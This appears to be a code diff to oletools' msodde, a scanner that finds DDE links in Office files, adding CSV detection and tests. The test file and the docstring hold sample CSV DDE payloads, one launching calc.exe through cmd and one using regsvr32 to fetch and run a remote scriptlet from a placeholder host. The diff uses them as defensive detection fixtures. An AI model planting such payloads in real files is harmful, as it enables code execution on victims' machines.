582 - if child.tag == TAG_W_FLDCHAR or child.tag == TAG_W_INSTRTEXT: 597 + for curr_elem in subs:
  598 + # check if w:r; parse children to pull out first FLDCHAR/INSTRTEXT
  599 + if curr_elem.tag == TAG_W_R:
  600 + for child in curr_elem:
  601 + if child.tag == TAG_W_FLDCHAR or \
  602 + child.tag == TAG_W_INSTRTEXT:
583 elem = child 603 elem = child
584 break 604 break
585 else: 605 else:
586 - elem = e  
587 - #this should be an error condition 606 + elem = curr_elem
  607 + # this should be an error condition
588 if elem is None: 608 if elem is None:
589 continue 609 continue
590 -  
591 - #check if FLDCHARTYPE and whether "begin" or "end" tag 610 +
  611 + # check if FLDCHARTYPE and whether "begin" or "end" tag
592 if elem.attrib.get(ATTR_W_FLDCHARTYPE) is not None: 612 if elem.attrib.get(ATTR_W_FLDCHARTYPE) is not None:
593 if elem.attrib[ATTR_W_FLDCHARTYPE] == "begin": 613 if elem.attrib[ATTR_W_FLDCHARTYPE] == "begin":
594 - level += 1 614 + level += 1
595 if elem.attrib[ATTR_W_FLDCHARTYPE] == "end": 615 if elem.attrib[ATTR_W_FLDCHARTYPE] == "end":
596 level -= 1 616 level -= 1
597 - if level == 0 or level == -1 : # edge-case where level becomes -1 617 + if level == 0 or level == -1: # edge-case; level becomes -1
598 fields.append(ddetext) 618 fields.append(ddetext)
599 ddetext = u'' 619 ddetext = u''
600 - level = 0 # reset edge-case  
601 - 620 + level = 0 # reset edge-case
  621 +
602 # concatenate the text of the field, if present: 622 # concatenate the text of the field, if present:
603 if elem.tag == TAG_W_INSTRTEXT and elem.text is not None: 623 if elem.tag == TAG_W_INSTRTEXT and elem.text is not None:
604 - #expand field code if QUOTED 624 + # expand field code if QUOTED
605 ddetext += unquote(elem.text) 625 ddetext += unquote(elem.text)
606 626
607 for elem in root.iter(TAG_W_FLDSIMPLE): 627 for elem in root.iter(TAG_W_FLDSIMPLE):
@@ -611,25 +631,28 @@ def process_xml(data): @@ -611,25 +631,28 @@ def process_xml(data):
611 631
612 return fields 632 return fields
613 633
614 -def unquote(field): 634 +
  635 +def unquote(field):
615 if "QUOTE" not in field or NO_QUOTES: 636 if "QUOTE" not in field or NO_QUOTES:
616 return field 637 return field
617 - #split into components 638 + # split into components
618 parts = field.strip().split(" ") 639 parts = field.strip().split(" ")
619 ddestr = "" 640 ddestr = ""
620 - for p in parts[1:]:  
621 - try:  
622 - ch = chr(int(p)) 641 + for part in parts[1:]:
  642 + try:
  643 + character = chr(int(part))
623 except ValueError: 644 except ValueError:
624 - ch = p  
625 - ddestr += ch 645 + character = part
  646 + ddestr += character
626 return ddestr 647 return ddestr
627 648
  649 +
628 # "static variables" for field_is_blacklisted: 650 # "static variables" for field_is_blacklisted:
629 FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+') 651 FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+')
630 FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST) 652 FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST)
631 FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$') 653 FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$')
632 654
  655 +
633 def field_is_blacklisted(contents): 656 def field_is_blacklisted(contents):
634 """ Check if given field contents matches any in FIELD_BLACKLIST 657 """ Check if given field contents matches any in FIELD_BLACKLIST
635 658
@@ -651,7 +674,7 @@ def field_is_blacklisted(contents): @@ -651,7 +674,7 @@ def field_is_blacklisted(contents):
651 index = FIELD_BLACKLIST_CMDS.index(words[0].lower()) 674 index = FIELD_BLACKLIST_CMDS.index(words[0].lower())
652 except ValueError: # first word is no blacklisted command 675 except ValueError: # first word is no blacklisted command
653 return False 676 return False
654 - log.debug('trying to match "{0}" to blacklist command {0}' 677 + log.debug('trying to match "{0}" to blacklist command {1}'
655 .format(contents, FIELD_BLACKLIST[index])) 678 .format(contents, FIELD_BLACKLIST[index]))
656 _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \ 679 _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \
657 = FIELD_BLACKLIST[index] 680 = FIELD_BLACKLIST[index]
@@ -706,14 +729,15 @@ def field_is_blacklisted(contents): @@ -706,14 +729,15 @@ def field_is_blacklisted(contents):
706 if 'numeric' in sw_format: 729 if 'numeric' in sw_format:
707 arg_choices = [] # too many choices to list them here 730 arg_choices = [] # too many choices to list them here
708 else: 731 else:
709 - log.debug('unexpected switch {0} in "{1}"'.format(switch, contents)) 732 + log.debug('unexpected switch {0} in "{1}"'
  733 + .format(switch, contents))
710 return False 734 return False
711 735
712 # if nothing went wrong sofar, the contents seems to match the blacklist 736 # if nothing went wrong sofar, the contents seems to match the blacklist
713 return True 737 return True
714 738
715 739
716 -def process_xlsx(filepath, filed_filter_mode=None): 740 +def process_xlsx(filepath):
717 """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """ 741 """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """
718 dde_links = [] 742 dde_links = []
719 parser = ooxml.XmlParser(filepath) 743 parser = ooxml.XmlParser(filepath)
@@ -733,7 +757,8 @@ def process_xlsx(filepath, filed_filter_mode=None): @@ -733,7 +757,8 @@ def process_xlsx(filepath, filed_filter_mode=None):
733 try: 757 try:
734 logging.info('Parsing non-xml subfile {0} with content type {1}' 758 logging.info('Parsing non-xml subfile {0} with content type {1}'
735 .format(subfile, content_type)) 759 .format(subfile, content_type))
736 - for record in xls_parser.parse_xlsb_part(handle, content_type, subfile): 760 + for record in xls_parser.parse_xlsb_part(handle, content_type,
  761 + subfile):
737 logging.debug('{0}: {1}'.format(subfile, record)) 762 logging.debug('{0}: {1}'.format(subfile, record))
738 if isinstance(record, xls_parser.XlsbBeginSupBook) and \ 763 if isinstance(record, xls_parser.XlsbBeginSupBook) and \
739 record.link_type == \ 764 record.link_type == \
@@ -791,8 +816,9 @@ class RtfFieldParser(rtfobj.RtfParser): @@ -791,8 +816,9 @@ class RtfFieldParser(rtfobj.RtfParser):
791 816
792 RTF_START = b'\x7b\x5c\x72\x74' # == b'{\rt' but does not mess up auto-indent 817 RTF_START = b'\x7b\x5c\x72\x74' # == b'{\rt' but does not mess up auto-indent
793 818
  819 +
794 def process_rtf(file_handle, field_filter_mode=None): 820 def process_rtf(file_handle, field_filter_mode=None):
795 - log.debug('process_rtf') 821 + """ find dde links or other fields in rtf file """
796 all_fields = [] 822 all_fields = []
797 data = RTF_START + file_handle.read() # read complete file into memory! 823 data = RTF_START + file_handle.read() # read complete file into memory!
798 file_handle.close() 824 file_handle.close()
@@ -818,35 +844,119 @@ def process_rtf(file_handle, field_filter_mode=None): @@ -818,35 +844,119 @@ def process_rtf(file_handle, field_filter_mode=None):
818 return u'\n'.join(clean_fields) 844 return u'\n'.join(clean_fields)
819 845
820 846
  847 +# threshold when to consider a csv file "small"; also used as sniffing size
  848 +CSV_SMALL_THRESH = 1024
  849 +
  850 +# format of dde link: program-name | arguments ! unimportant
  851 +CSV_DDE_FORMAT = re.compile(r'\s*=(.+)\|(.+)!(.*)\s*')
  852 +
  853 +# allowed delimiters (python sniffer would use nearly any char). Taken from
  854 +# https://data-gov.tw.rpi.edu/wiki/CSV_files_use_delimiters_other_than_commas
  855 +CSV_DELIMITERS = ',\t ;|^'
  856 +
  857 +
  858 +def process_csv(filepath):
  859 + """ find dde in csv text
  860 +
  861 + finds text parts like =cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'! or
  862 + =MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 [...]
  863 +
  864 + Hoping here that the :py:class:`csv.Sniffer` determines quote and delimiter
  865 + chars the same way that excel does. Tested to some extend in unittests.
  866 +
  867 + This can only find DDE-links, no other "suspicious" constructs (yet).
  868 + """
  869 +
  870 + results = []
  871 + with open(filepath, 'r') as file_handle:
  872 + results, dialect = process_csv_dialect(file_handle, CSV_DELIMITERS)
  873 + is_small = file_handle.tell() < CSV_SMALL_THRESH
  874 +
  875 + if is_small and not results:
  876 + # easy to mis-sniff small files. Try different delimiters
  877 + log.debug('small file, no results; try all delimiters')
  878 + file_handle.seek(0)
  879 + other_delim = CSV_DELIMITERS.replace(dialect.delimiter, '')
  880 + for delim in other_delim:
  881 + try:
  882 + file_handle.seek(0)
  883 + results, _ = process_csv_dialect(file_handle, delim)
  884 + except csv.Error: # e.g. sniffing fails
  885 + log.debug('failed to csv-parse with delimiter {0!r}'
  886 + .format(delim))
  887 +
  888 + if is_small and not results:
  889 + # try whole file as single cell, since sniffing fails in this case
  890 + log.debug('last attempt: take whole file as single unquoted cell')
  891 + file_handle.seek(0)
  892 + match = CSV_DDE_FORMAT.match(file_handle.read(CSV_SMALL_THRESH))
  893 + if match:
  894 + results.append(u' '.join(match.groups()[:2]))
  895 +
  896 + return u'\n'.join(results)
  897 +
  898 +
  899 +def process_csv_dialect(file_handle, delimiters):
  900 + """ helper for process_csv: process with a specific csv dialect """
  901 +
  902 + # determine dialect = delimiter chars, quote chars, ...
  903 + dialect = csv.Sniffer().sniff(file_handle.read(CSV_SMALL_THRESH),
  904 + delimiters=delimiters)
  905 + dialect.strict = False # microsoft is never strict
  906 + log.debug('sniffed csv dialect with delimiter {0!r} '
  907 + 'and quote char {1!r}'
  908 + .format(dialect.delimiter, dialect.quotechar))
  909 +
  910 + # rewind file handle to start
  911 + file_handle.seek(0)
  912 +
  913 + # loop over all csv rows and columns
  914 + results = []
  915 + reader = csv.reader(file_handle, dialect)
  916 + for row in reader:
  917 + for cell in row:
  918 + # check if cell matches
  919 + match = CSV_DDE_FORMAT.match(cell)
  920 + if match:
  921 + results.append(u' '.join(match.groups()[:2]))
  922 + return results, dialect
  923 +
  924 +
821 def process_file(filepath, field_filter_mode=None): 925 def process_file(filepath, field_filter_mode=None):
822 - """ decides which of process_doc/x or process_xls/x to call """ 926 + """ decides which of the process_* functions to call """
823 if olefile.isOleFile(filepath): 927 if olefile.isOleFile(filepath):
824 - log.debug('checking streams to see whether this is xls') 928 + log.debug('Is OLE. Checking streams to see whether this is xls')
825 if xls_parser.is_xls(filepath): 929 if xls_parser.is_xls(filepath):
  930 + log.debug('Process file as excel 2003 (xls)')
826 return process_xls(filepath) 931 return process_xls(filepath)
827 else: 932 else:
  933 + log.debug('Process file as word 2003 (doc)')
828 return process_doc(filepath) 934 return process_doc(filepath)
829 935
830 with open(filepath, 'rb') as file_handle: 936 with open(filepath, 'rb') as file_handle:
831 - if file_handle.read(4) == RTF_START:  
832 - # This is a RTF file 937 + if file_handle.read(4) == RTF_START:
  938 + log.debug('Process file as rtf')
833 return process_rtf(file_handle, field_filter_mode) 939 return process_rtf(file_handle, field_filter_mode)
834 940
835 try: 941 try:
836 doctype = ooxml.get_type(filepath) 942 doctype = ooxml.get_type(filepath)
837 - except Exception:  
838 - log.debug('Exception trying to xml-parse file', exc_info=True) 943 + log.debug('Detected file type: {0}'.format(doctype))
  944 + except Exception as exc:
  945 + log.debug('Exception trying to xml-parse file: {0}'.format(exc))
839 doctype = None 946 doctype = None
840 947
841 - if doctype:  
842 - log.debug('Detected file type: {0}'.format(doctype))  
843 if doctype == ooxml.DOCTYPE_EXCEL: 948 if doctype == ooxml.DOCTYPE_EXCEL:
844 - return process_xlsx(filepath, field_filter_mode)  
845 - else: 949 + log.debug('Process file as excel 2007+ (xlsx)')
  950 + return process_xlsx(filepath)
  951 + elif doctype is None:
  952 + log.debug('Process file as csv')
  953 + return process_csv(filepath)
  954 + else: # could be docx; if not: this is the old default code path
  955 + log.debug('Process file as word 2007+ (docx)')
846 return process_docx(filepath, field_filter_mode) 956 return process_docx(filepath, field_filter_mode)
847 957
848 958
849 -#=== MAIN ================================================================= 959 +# === MAIN =================================================================
850 960
851 def main(cmd_line_args=None): 961 def main(cmd_line_args=None):
852 """ Main function, called if this file is called as a script 962 """ Main function, called if this file is called as a script
@@ -868,10 +978,10 @@ def main(cmd_line_args=None): @@ -868,10 +978,10 @@ def main(cmd_line_args=None):
868 if args.json and args.loglevel.lower() == 'debug': 978 if args.json and args.loglevel.lower() == 'debug':
869 log.warning('Debug log output will not be json-compatible!') 979 log.warning('Debug log output will not be json-compatible!')
870 980
871 - if args.nounquote : 981 + if args.nounquote:
872 global NO_QUOTES 982 global NO_QUOTES
873 NO_QUOTES = True 983 NO_QUOTES = True
874 - 984 +
875 if args.json: 985 if args.json:
876 jout = [] 986 jout = []
877 jout.append(BANNER_JSON) 987 jout.append(BANNER_JSON)
@@ -890,7 +1000,7 @@ def main(cmd_line_args=None): @@ -890,7 +1000,7 @@ def main(cmd_line_args=None):
890 except Exception as exc: 1000 except Exception as exc:
891 if args.json: 1001 if args.json:
892 jout.append(dict(type='error', error=type(exc).__name__, 1002 jout.append(dict(type='error', error=type(exc).__name__,
893 - message=str(exc))) # strange: str(exc) is enclosed in "" 1003 + message=str(exc)))
894 else: 1004 else:
895 raise # re-raise last known exception, keeping trace intact 1005 raise # re-raise last known exception, keeping trace intact
896 1006
tests/msodde/test_basic.py
@@ -17,11 +17,13 @@ from traceback import print_exc @@ -17,11 +17,13 @@ from traceback import print_exc
17 17
18 18
19 class TestReturnCode(unittest.TestCase): 19 class TestReturnCode(unittest.TestCase):
  20 + """ check return codes and exception behaviour (not text output) """
20 21
21 def test_valid_doc(self): 22 def test_valid_doc(self):
22 """ check that a valid doc file leads to 0 exit status """ 23 """ check that a valid doc file leads to 0 exit status """
23 - for filename in ('dde-test-from-office2003', 'dde-test-from-office2016',  
24 - 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'): 24 + for filename in (
  25 + 'dde-test-from-office2003', 'dde-test-from-office2016',
  26 + 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'):
25 self.do_test_validity(join(BASE_DIR, 'msodde', 27 self.do_test_validity(join(BASE_DIR, 'msodde',
26 filename + '.doc')) 28 filename + '.doc'))
27 29
@@ -65,9 +67,9 @@ class TestReturnCode(unittest.TestCase): @@ -65,9 +67,9 @@ class TestReturnCode(unittest.TestCase):
65 except Exception: 67 except Exception:
66 have_exception = True 68 have_exception = True
67 print_exc() 69 print_exc()
68 - except SystemExit as se: # sys.exit() was called  
69 - return_code = se.code  
70 - if se.code is None: 70 + except SystemExit as exc: # sys.exit() was called
  71 + return_code = exc.code
  72 + if exc.code is None:
71 return_code = 0 73 return_code = 0
72 74
73 self.assertEqual(expect_error, have_exception or (return_code != 0), 75 self.assertEqual(expect_error, have_exception or (return_code != 0),
@@ -77,9 +79,13 @@ class TestReturnCode(unittest.TestCase): @@ -77,9 +79,13 @@ class TestReturnCode(unittest.TestCase):
77 79
78 80
79 class TestDdeLinks(unittest.TestCase): 81 class TestDdeLinks(unittest.TestCase):
  82 + """ capture output of msodde and check dde-links are found correctly """
80 83
81 def get_dde_from_output(self, capturer): 84 def get_dde_from_output(self, capturer):
82 - """ helper to read dde links from captured output """ 85 + """ helper to read dde links from captured output
  86 +
  87 + duplicate in tests/msodde/test_csv
  88 + """
83 have_start_line = False 89 have_start_line = False
84 result = [] 90 result = []
85 for line in capturer: 91 for line in capturer:
@@ -90,7 +96,7 @@ class TestDdeLinks(unittest.TestCase): @@ -90,7 +96,7 @@ class TestDdeLinks(unittest.TestCase):
90 elif line == 'DDE Links:': 96 elif line == 'DDE Links:':
91 have_start_line = True 97 have_start_line = True
92 98
93 - self.assertTrue(have_start_line) # ensure output was complete 99 + self.assertTrue(have_start_line) # ensure output was complete
94 return result 100 return result
95 101
96 def test_with_dde(self): 102 def test_with_dde(self):
tests/msodde/test_blacklist.py
@@ -39,8 +39,8 @@ EXAMPLES_MATCH = ( @@ -39,8 +39,8 @@ EXAMPLES_MATCH = (
39 r'ADVANCE \x 150', 39 r'ADVANCE \x 150',
40 r'AUTHOR', 40 r'AUTHOR',
41 r'AUTHOR "Tony Caruso"', 41 r'AUTHOR "Tony Caruso"',
42 - r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033"  
43 - r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo 42 + r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033"
  43 + r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo
44 r'COMMENTS', 44 r'COMMENTS',
45 r'COMMENTS "I came, I saw, I was not impressed."', 45 r'COMMENTS "I came, I saw, I was not impressed."',
46 r'CREATEDATE', 46 r'CREATEDATE',
@@ -228,6 +228,7 @@ EXAMPLES_NOMATCH = ( @@ -228,6 +228,7 @@ EXAMPLES_NOMATCH = (
228 r'SKIPIF MERGEFIELD Order < 100', 228 r'SKIPIF MERGEFIELD Order < 100',
229 ) 229 )
230 230
  231 +
231 class TestBlacklist(unittest.TestCase): 232 class TestBlacklist(unittest.TestCase):
232 """ Tests msodde blacklist feature """ 233 """ Tests msodde blacklist feature """
233 234
tests/msodde/test_csv.py 0 → 100644
  1 +#!/usr/bin/env python3
  2 +
  3 +
  4 +""" Check various csv examples """
  5 +
  6 +import unittest
  7 +from tempfile import mkstemp
  8 +import os
  9 +from os.path import join
  10 +
  11 +from oletools import msodde
  12 +from tests.test_utils import OutputCapture, DATA_BASE_DIR
  13 +
  14 +
  15 +class TestCSV(unittest.TestCase):
  16 + """ Check various csv examples """
  17 +
  18 + DO_DEBUG = False
  19 +
  20 + def test_texts(self):
  21 + """ write some sample texts to file, run those """
  22 + SAMPLES = (
  23 + "=cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'!''",
  24 + "=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u " +
  25 + "/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''",
  26 + "completely innocent text"
  27 + )
  28 +
  29 + LONG_SAMPLE_FACTOR = 100 # make len(sample) > CSV_SMALL_THRESH
  30 + DELIMITERS = ',\t ;|^'
  31 + QUOTES = '', '"' # no ' since samples use those "internally"
  32 + PREFIXES = ('', '{quote}item-before{quote}{delim}',
  33 + '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR,
  34 + '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR +
  35 + '{quote}item-before{quote}{delim}')
  36 + SUFFIXES = ('', '{delim}{quote}item-after{quote}',
  37 + '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR,
  38 + '{delim}{quote}item-after{quote}' +
  39 + '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR)
  40 +
  41 + for sample_core in SAMPLES:
  42 + for prefix in PREFIXES:
  43 + for suffix in SUFFIXES:
  44 + for delim in DELIMITERS:
  45 + for quote in QUOTES:
  46 + # without quoting command is split at space or |
  47 + if quote == '' and delim in sample_core:
  48 + continue
  49 +
  50 + sample = \
  51 + prefix.format(quote=quote, delim=delim) + \
  52 + quote + sample_core + quote + \
  53 + suffix.format(quote=quote, delim=delim)
  54 + output = self.write_and_run(sample)
  55 + n_links = len(self.get_dde_from_output(output))
  56 + desc = 'sample with core={0!r}, prefix-len {1}, ' \
  57 + 'suffix-len {2}, delim {3!r} and quote ' \
  58 + '{4!r}'.format(sample_core, len(prefix),
  59 + len(suffix), delim, quote)
  60 + if 'innocent' in sample:
  61 + self.assertEqual(n_links, 0, 'found dde-link '
  62 + 'in clean sample')
  63 + else:
  64 + msg = 'Failed to find dde-link in ' + desc
  65 + self.assertEqual(n_links, 1, msg)
  66 + if self.DO_DEBUG:
  67 + print('Worked: ' + desc)
  68 +
  69 + def test_file(self):
  70 + """ test simple small example file """
  71 + filename = join(DATA_BASE_DIR, 'msodde', 'dde-in-csv.csv')
  72 + with OutputCapture() as capturer:
  73 + capturer.reload_module(msodde) # re-create logger
  74 + ret_code = msodde.main([filename, ])
  75 + self.assertEqual(ret_code, 0)
  76 + links = self.get_dde_from_output(capturer)
  77 + self.assertEqual(len(links), 1)
  78 + self.assertEqual(links[0],
  79 + r"cmd '/k \..\..\..\Windows\System32\calc.exe'")
  80 +
  81 + def write_and_run(self, sample_text):
  82 + """ helper for test_texts: save text to file, run through msodde """
  83 + filename = None
  84 + handle = 0
  85 + try:
  86 + handle, filename = mkstemp(prefix='oletools-test-csv-', text=True)
  87 + os.write(handle, sample_text.encode('ascii'))
  88 + os.close(handle)
  89 + handle = 0
  90 + args = [filename, ]
  91 + if self.DO_DEBUG:
  92 + args += ['-l', 'debug']
  93 +
  94 + with OutputCapture() as capturer:
  95 + capturer.reload_module(msodde) # re-create logger
  96 + ret_code = msodde.main(args)
  97 + self.assertEqual(ret_code, 0, 'checking sample resulted in '
  98 + 'error:\n' + sample_text)
  99 + return capturer
  100 +
  101 + except Exception:
  102 + raise
  103 + finally:
  104 + if handle:
  105 + os.close(handle)
  106 + handle = 0 # just in case
  107 + if filename:
  108 + if self.DO_DEBUG:
  109 + print('keeping for debug purposes: {0}'.format(filename))
  110 + else:
  111 + os.remove(filename)
  112 + filename = None # just in case
  113 +
  114 + def get_dde_from_output(self, capturer):
  115 + """ helper to read dde links from captured output
  116 +
  117 + duplicate in tests/msodde/test_basic
  118 + """
  119 + have_start_line = False
  120 + result = []
  121 + for line in capturer:
  122 + if self.DO_DEBUG:
  123 + print('captured: ' + line)
  124 + if not line.strip():
  125 + continue # skip empty lines
  126 + if have_start_line:
  127 + result.append(line)
  128 + elif line == 'DDE Links:':
  129 + have_start_line = True
  130 +
  131 + self.assertTrue(have_start_line) # ensure output was complete
  132 + return result
  133 +
  134 +
  135 +# just in case somebody calls this file as a script
  136 +if __name__ == '__main__':
  137 + unittest.main()
tests/ooxml/test_basic.py
@@ -12,24 +12,33 @@ from oletools import ooxml @@ -12,24 +12,33 @@ from oletools import ooxml
12 class TestOOXML(unittest.TestCase): 12 class TestOOXML(unittest.TestCase):
13 """ Tests my cool new feature """ 13 """ Tests my cool new feature """
14 14
  15 + DO_DEBUG = False
  16 +
15 def test_all_rough(self): 17 def test_all_rough(self):
16 """Checks all samples, expect either ole files or good ooxml output""" 18 """Checks all samples, expect either ole files or good ooxml output"""
17 acceptable = ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD, \ 19 acceptable = ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD, \
18 ooxml.DOCTYPE_POWERPOINT 20 ooxml.DOCTYPE_POWERPOINT
  21 +
  22 + # files that are neither OLE nor xml:
19 except_files = 'empty', 'text' 23 except_files = 'empty', 'text'
20 - except_extns = '.xml', '.rtf' 24 + except_extns = '.xml', '.rtf', '.csv'
  25 +
  26 + # analyse all files in data dir
21 for base_dir, _, files in os.walk(DATA_BASE_DIR): 27 for base_dir, _, files in os.walk(DATA_BASE_DIR):
22 for filename in files: 28 for filename in files:
23 if filename in except_files: 29 if filename in except_files:
24 - #print('skip file: ' + filename) 30 + if self.DO_DEBUG:
  31 + print('skip file: ' + filename)
25 continue 32 continue
26 if splitext(filename)[1] in except_extns: 33 if splitext(filename)[1] in except_extns:
27 - #print('skip extn: ' + filename) 34 + if self.DO_DEBUG:
  35 + print('skip extn: ' + filename)
28 continue 36 continue
29 37
30 full_name = join(base_dir, filename) 38 full_name = join(base_dir, filename)
31 if isOleFile(full_name): 39 if isOleFile(full_name):
32 - #print('skip ole: ' + filename) 40 + if self.DO_DEBUG:
  41 + print('skip ole: ' + filename)
33 continue 42 continue
34 try: 43 try:
35 doctype = ooxml.get_type(full_name) 44 doctype = ooxml.get_type(full_name)
@@ -38,7 +47,8 @@ class TestOOXML(unittest.TestCase): @@ -38,7 +47,8 @@ class TestOOXML(unittest.TestCase):
38 self.assertTrue(doctype in acceptable, 47 self.assertTrue(doctype in acceptable,
39 msg='Doctype "{0}" for {1} not acceptable' 48 msg='Doctype "{0}" for {1} not acceptable'
40 .format(doctype, full_name)) 49 .format(doctype, full_name))
41 - #print('ok: ' + filename + doctype) 50 + if self.DO_DEBUG:
  51 + print('ok: {0} --> {1}'.format(filename, doctype))
42 52
43 53
44 # just in case somebody calls this file as a script 54 # just in case somebody calls this file as a script
tests/test-data/msodde/dde-in-csv.csv 0 → 100644
  1 +=cmd|'/k \..\..\..\Windows\System32\calc.exe'!A0
tests/test_utils/output_capture.py
@@ -2,13 +2,20 @@ @@ -2,13 +2,20 @@
2 2
3 from __future__ import print_function 3 from __future__ import print_function
4 import sys 4 import sys
  5 +import logging
5 6
6 7
7 # python 2/3 version conflict: 8 # python 2/3 version conflict:
8 if sys.version_info.major <= 2: 9 if sys.version_info.major <= 2:
9 from StringIO import StringIO 10 from StringIO import StringIO
  11 + # reload is a builtin
10 else: 12 else:
11 from io import StringIO 13 from io import StringIO
  14 + if sys.version_info.minor < 4:
  15 + from imp import reload
  16 + else:
  17 + from importlib import reload
  18 +
12 19
13 class OutputCapture: 20 class OutputCapture:
14 """ context manager that captures stdout 21 """ context manager that captures stdout
@@ -24,6 +31,10 @@ class OutputCapture: @@ -24,6 +31,10 @@ class OutputCapture:
24 # ...or test all output in one go 31 # ...or test all output in one go
25 some_test(capturer.get_data()) 32 some_test(capturer.get_data())
26 33
  34 + In order to solve issues with old logger instances still remembering closed
  35 + StringIO instances as "their" stdout, logging is shutdown and restarted
  36 + upon entering this Context Manager. This means that you may have to reload
  37 + your module, as well.
27 """ 38 """
28 39
29 def __init__(self): 40 def __init__(self):
@@ -32,6 +43,11 @@ class OutputCapture: @@ -32,6 +43,11 @@ class OutputCapture:
32 self.data = None 43 self.data = None
33 44
34 def __enter__(self): 45 def __enter__(self):
  46 + # Avoid problems with old logger instances that still remember an old
  47 + # closed StringIO as their sys.stdout
  48 + logging.shutdown()
  49 + reload(logging)
  50 +
35 # replace sys.stdout with own buffer. 51 # replace sys.stdout with own buffer.
36 self.orig_stdout = sys.stdout 52 self.orig_stdout = sys.stdout
37 sys.stdout = self.buffer 53 sys.stdout = self.buffer
@@ -61,3 +77,7 @@ class OutputCapture: @@ -61,3 +77,7 @@ class OutputCapture:
61 def __iter__(self): 77 def __iter__(self):
62 for line in self.get_data().splitlines(): 78 for line in self.get_data().splitlines():
63 yield line 79 yield line
  80 +
  81 + def reload_module(self, mod):
  82 + """ Wrapper around reload function for different python versions """
  83 + return reload(mod)